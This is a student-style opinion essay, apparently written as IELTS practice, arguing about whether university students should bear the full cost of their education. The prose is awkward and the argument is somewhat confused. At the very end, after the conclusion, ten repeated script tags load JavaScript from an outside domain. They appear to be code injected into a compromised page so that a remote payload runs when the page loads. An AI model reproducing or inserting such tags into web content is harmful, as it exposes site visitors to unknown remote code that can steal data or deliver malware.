Some people believe that university students should pay all the cost of studies because university education only benefits the students themselves, not the society as a whole. To what extent do you agree or disagree?

In this contemporary life, there are many people think that students in university need to pay all the tuition because university education only benefits for students, not benefits for society. From my perspective, students should pay for their course but university also pay other parts to support better education and this essay will examine and give my opinion.

Admittedly, there are some arguments in favor of university should pay some cost in education. First, university subsidies for higher education are believed to equalize education opportunities among young adolescents regardless of their background family. This financial support, presumably tends not only to increase the overall study rate of lower-income people but also to mitigate their feeling of inferiority, which promotes an egalitarian society.Second, university pay other cost in education would probably result in a greater supply of highly qualified workers, which benefits society in the long run. In fact, it is acknowledged that skilled and knowledgeable human capital is imperative to foster economic growth and technological development in any nations.

Nevertheless, the resultant problems would be far more significant than the minor benefits once university pay other cost for students. First, university pay other cost for students would likely correspond with a tremendous financial strain on a country. Generating no income from tuition and fees, university could over-reliant on the state budget for funding, meaning that there would be less input to develop other important areas such as healthcare system and transport infrastructure. Second, university need to pay other cost for higher education tempt many young people including those who are not academically inclined or show no interest in studying and potentially wasting time and money that these young people could spent their time on suitable career paths. It, instead, would be a more financial viable option if the resources were focused on supporting less privileged yet gifted students.

In conclusion, university could spend cost for other things to support students for study but it’s not meaning that university just benefits for students because students can be a necessary people in the future. From my perspective, government need to have a new rule for cost in university to balance that. <script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>